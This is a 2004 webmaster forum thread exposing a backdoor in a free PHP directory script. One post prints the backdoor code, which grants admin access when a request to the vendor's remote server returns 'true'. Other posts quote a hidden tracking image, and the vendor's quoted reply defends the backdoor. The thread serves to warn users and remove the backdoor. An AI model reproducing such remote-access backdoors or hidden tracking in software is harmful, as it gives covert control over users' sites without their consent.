Webmaster Forum

Go Back   Webmaster Forum > Marketing Forums > Web Directory Issues

Web Directory Issues Issues pertaining to operating or dealing with online directories, or general info about DMOZ, Yahoo!, Google Directory, BOTW, Ezilon, etc.


Reply
 
LinkBack Thread Tools Display Modes
Share |
  #1 (permalink)  
Old 09-05-2004, 07:49 AM
Member
Latest Blog:
None

 
Join Date: 08-15-04
Location: Europe
Posts: 73
iTrader: 0 / 0%
Backdoor in 'Free PHP Directory Script' ?

I read some reviews about Biz Directory's Free PHP Directory Script and some said that there was a backdoor that allowed the programmer to enter your admin area and delete everything in your database.

I had a quick look at the scripts but couldnt find anything besides an ordinary, invisible gif.

I wouldn't want to risk my directory because of this... free script or not.
Do you run this script?
__________________
Proxy4Free
 
Reply With Quote
  #2 (permalink)  
Old 09-05-2004, 08:17 AM
awall19's Avatar
Senior Member
Latest Blog:
None

 
Join Date: 02-18-04
Location: We Are Penn State!
Posts: 3,118
iTrader: 0 / 0%
I run the script. I save my databases frequently. If somebody did that then you can bet he would not be selling too many more scripts.
 
Reply With Quote
  #3 (permalink)  
Old 09-05-2004, 08:32 AM
Junior Member
 
Join Date: 09-02-04
Location: Germany
Posts: 18
iTrader: 0 / 0%
There are 2 dirty tricks inside the original free script:

1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer

Greets
 
Reply With Quote
  #4 (permalink)  
Old 09-05-2004, 09:28 AM
awall19's Avatar
Senior Member
Latest Blog:
None

 
Join Date: 02-18-04
Location: We Are Penn State!
Posts: 3,118
iTrader: 0 / 0%
Quote:
Originally Posted by MarketingLady
There are 2 dirty tricks inside the original free script:

1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer

Greets
how do you remove the part in #1 while still leaving the script operable?

if you remove that code of line from #2 does that link go away?
 
Reply With Quote
  #5 (permalink)  
Old 09-05-2004, 09:40 AM
No Longer Here
Latest Blog:
None

 
Join Date: 09-27-03
Location: State College, PA
Posts: 4,273
iTrader: 0 / 0%
These are only in the free version?
 
Reply With Quote
  #6 (permalink)  
Old 09-05-2004, 09:54 AM
awall19's Avatar
Senior Member
Latest Blog:
None

 
Join Date: 02-18-04
Location: We Are Penn State!
Posts: 3,118
iTrader: 0 / 0%
Quote:
Originally Posted by Jazzee
These are only in the free version?
well if you do the $50 version you only take out the links back to his site...which is kinda screwed up if he leaves an easter egg link in there anyway.

not sure about the $700 version. if he does it with that then he is really messed up
 
Reply With Quote
  #7 (permalink)  
Old 09-05-2004, 12:34 PM
v7n Mentor
 
Join Date: 01-25-04
Location: Corpus Christi, Texas
Posts: 758
iTrader: 0 / 0%
Quote:
Originally Posted by awall19
Quote:
Originally Posted by Jazzee
These are only in the free version?
well if you do the $50 version you only take out the links back to his site...which is kinda screwed up if he leaves an easter egg link in there anyway.

not sure about the $700 version. if he does it with that then he is really messed up
The full version does not have it. I went through the whole script early today but it has been modified a lot since installation; so I’m not exactly sure if it originally contained it.
I would be one aggravated person if it did. I paid what I considered big bucks for a script that had very poor cross browser compatibility and have spent over a $1,000 dollars to make it so and it’s still not right.
__________________
WoW Local & Regional
Skaffe Local & Regional Directory
Professional Website Directory Marketing

 
Reply With Quote
  #8 (permalink)  
Old 09-05-2004, 01:57 PM
Junior Member
 
Join Date: 09-02-04
Location: Germany
Posts: 18
iTrader: 0 / 0%
Hi awall19

Here is a little "backdoor-fix" for #1

if ($pass) {
$rand = md5(time());
$access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
$access = fread($access,4);
if ($access == "true") {
session_start();
$HTTP_SESSION_VARS['admin'] = true;
header("Location: {$dir}admin_edit.php");
};
};

For my part, I don't like people programming backdoors in free available scripts. It isn't honest at all !
I don't know, if the $700 script has the backdoor too; if someone sends me the code, I need 2 days to check it out with some capable university specialists and post you all the results or, if necessary fixes.

Greets from Germany
 
Reply With Quote
  #9 (permalink)  
Old 09-05-2004, 02:06 PM
Junior Member
 
Join Date: 09-02-04
Location: Germany
Posts: 18
iTrader: 0 / 0%
Sorry, awall19, I didn't answer your second question; to keep it simple, just replace the image inside <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> by your own image, e.g. <IMG SRC="http://www.mydomain.com/imges/any_image.gif" WIDTH=1 HEIGHT=1>, the image I mean beeing located on your own server. This way, bad boys can't get the referer any more :-)

Greets
 
Reply With Quote
  #10 (permalink)  
Old 09-05-2004, 02:27 PM
awall19's Avatar
Senior Member
Latest Blog:
None

 
Join Date: 02-18-04
Location: We Are Penn State!
Posts: 3,118
iTrader: 0 / 0%
Quote:
Originally Posted by MarketingLady
Hi awall19

Here is a little "backdoor-fix" for #1

if ($pass) {
$rand = md5(time());
$access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
$access = fread($access,4);
if ($access == "true") {
session_start();
$HTTP_SESSION_VARS['admin'] = true;
header("Location: {$dir}admin_edit.php");
};
};

Greets from Germany
I pulled this part ttp://www.directory-search.org/include_variables.php? out of my script. does that work? what details was he sending? the PHPmyAdmin variables or just the general MySQL connect info
 
Reply With Quote
  #11 (permalink)  
Old 09-06-2004, 07:40 AM
Contributing Member
Latest Blog:
None

 
Join Date: 01-19-04
Posts: 57
iTrader: 0 / 0%
I have sent the link of this thread to Javier Garc*a of Biz Directory. Awaitng his response.
 
Reply With Quote
  #12 (permalink)  
Old 09-06-2004, 08:53 AM
samer's Avatar
Contributing Member
Latest Blog:
None

 
Join Date: 10-13-03
Posts: 1,962
iTrader: 0 / 0%
please inform us asap !
 
Reply With Quote
  #13 (permalink)  
Old 09-06-2004, 09:18 AM
Contributing Member
Latest Blog:
None

 
Join Date: 01-19-04
Posts: 57
iTrader: 0 / 0%
He has sent a reply to me - reproduced below:

"The invisible image is just that, an image, unable to hurt in any way. It allows us to keep the records of installed scripts. It's more convenient than requesting the installation url every time the script is downloaded/installed.

The backdoor is password-protected, so it is impossible nobody but us can access the script, not even people with access to the script code. We added this feature several months after the first distribution of the script. We had several problems with abusive users, not only removing copyright links but also reselling the script, besides other aggressive actions. So we decided to include this tool. We have only used it once, and its use was more than justified. As the full script is distributed after the purchase, and there is no risk, it does not include this feature.

I can assure you no legal user of the script has anything to be afraid. In fact, if you or any other purchaser want a script copy without these things, I will have no problem sending it.

Regards

Javier Garc*a
Biz Directory"

So it turns out they have been stealing our passwords?
 
Reply With Quote
  #14 (permalink)  
Old 09-06-2004, 09:42 AM
No Longer Here
Latest Blog:
None

 
Join Date: 09-27-03
Location: State College, PA
Posts: 4,273
iTrader: 0 / 0%
That is ridiculous. Shoudn't they have to tell you about that when you download the script?
 
Reply With Quote
  #15 (permalink)  
Old 09-06-2004, 10:38 AM
JayM's Avatar
Senior Member
Latest Blog:
None

 
Join Date: 07-31-04
Posts: 140
iTrader: 0 / 0%
Unless thats written somewhere in their tos and you agree to it, it is illegal for them to do this. Thats just like distributing a trojan.
 
Reply With Quote
  #16 (permalink)  
Old 09-06-2004, 12:56 PM
Member
Latest Blog:
None

 
Join Date: 08-15-04
Location: Europe
Posts: 73
iTrader: 0 / 0%
Quote:
Originally Posted by Jazzee
That is ridiculous. Shoudn't they have to tell you about that when you download the script?
well, would anybody download it if they advertised it as a backdoor script?

-

thanks for the research. after having a look at the programmer's email I decided to remove the backdoor (AND the uninstall script) and install the script first of all. I also installed another script that will have a look at the script directory and the mysql database... not sure if it will remain online yet.
__________________
Proxy4Free
 
Reply With Quote
  #17 (permalink)  
Old 09-06-2004, 12:58 PM
No Longer Here
Latest Blog:
None

 
Join Date: 09-27-03
Location: State College, PA
Posts: 4,273
iTrader: 0 / 0%
Quote:
Originally Posted by Brian911
well, would anybody download it if they advertised it as a backdoor script?
No, but you'd think they'd have it in fine print somewhere.
 
Reply With Quote
  #18 (permalink)  
Old 09-06-2004, 01:01 PM
John Scott's Avatar
Individualist
Latest Blog:
None

 
Join Date: 09-27-03
Location: Seattle
Posts: 27,807
iTrader: 3 / 100%
That is just on the free version. And, I can see Javier's point. If I offered a script for free, and they removed copyright notices/etc, I wouldn't be too happy.
__________________
It is no measure of health to be well adjusted to a profoundly sick society.
Individualism.com .::. AutoBlogAfrica :.
 
Reply With Quote
  #19 (permalink)  
Old 09-06-2004, 01:02 PM
No Longer Here
Latest Blog:
None

 
Join Date: 09-27-03
Location: State College, PA
Posts: 4,273
iTrader: 0 / 0%
That doesn't make it right.
 
Reply With Quote
  #20 (permalink)  
Old 09-06-2004, 01:08 PM
John Scott's Avatar
Individualist
Latest Blog:
None

 
Join Date: 09-27-03
Location: Seattle
Posts: 27,807
iTrader: 3 / 100%
I fail to see how it could be wrong.
__________________
It is no measure of health to be well adjusted to a profoundly sick society.
Individualism.com .::. AutoBlogAfrica :.
 
Reply With Quote
Go Back   Webmaster Forum > Marketing Forums > Web Directory Issues

Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Please, Can someone help me with the free php directory script Loondatoon Web Directory Issues 2 07-13-2007 09:28 AM
free php directory script SEOclown Web Directory Issues 22 01-25-2007 10:17 PM
Free PHP Directory Script Template? jezza chan Graphic Design Forum 5 09-24-2006 08:16 PM
Free php directory script dingodave Web Directory Issues 6 08-28-2006 01:06 PM
Any free directory script for Windows? AverageGuy Web Directory Issues 2 08-08-2006 07:00 PM


V7N Network
Get exposure! V7N I Love Photography V7N SEO Blog V7N Directory


All times are GMT -7. The time now is 12:01 AM.
Powered by vBulletin
Copyright 2000-2014 Jelsoft Enterprises Limited.
Copyright © 2003 - 2014 Escalate Media




Search Engine Optimization by vBSEO 3.6.0 RC 2 ©2011, Crawlability, Inc.